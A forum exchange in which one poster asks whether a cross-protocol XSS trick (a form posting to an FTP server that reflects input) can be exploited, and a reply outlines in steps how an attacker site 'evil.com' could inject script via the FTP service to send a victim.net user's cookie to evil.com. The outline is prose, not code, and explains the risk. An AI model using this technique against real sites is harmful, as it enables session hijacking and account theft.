He guys,
I just read this post about really nasty (and cool at the same time) ways to perform XSS. However, there is still something unclear to me.
I understand the full concept of the attack, however, I dont see how this can potentially be exploited. The "action" attribute inside the form must point to a ftp server (or any other server that reflects input), but this is never the case.
So unless you have another XSS hole to inject such a form this vulnerability cannot be exploited. My question is if my conclusion that it cannot be exploited is true, or that im missing something?
This is exploitable as follows.
- MrCrim wants to steal the login of someone that uses victim.net
- MrCrim notices that victim.net is running an ftp server on an unusual port
- MrCrim puts up a form on his own site, evil.com
- The form contains the "ftp commands" in the form elements and its post action is to victim.net
- MrCrim writes a JS script that steals document.cookie from a site and hosts that script in a .js file on evil.com. It probably works by including the cookie string as part of an image source URL that is requested from evil.com
- One of the "ftp commands" in MrCrim's form is constructed to write a small bit of JS that executes MrCrim's cookie-stealing script
- MrCrim tempts people to look at evil.com by posting links on forums and sending spam.
- UnsuspectingUser follows a link posted in his favourite forum and lands at evil.com. He posts the form, not knowing of its evil and wily intentions
- UnsuspectingUser is now on victim.net and Bam! the JS "injected" by the FTP server is executed and UnsuspectingUser's cookie for victim.net get's sent to evil.com
- Profit! :-)
Menu
889
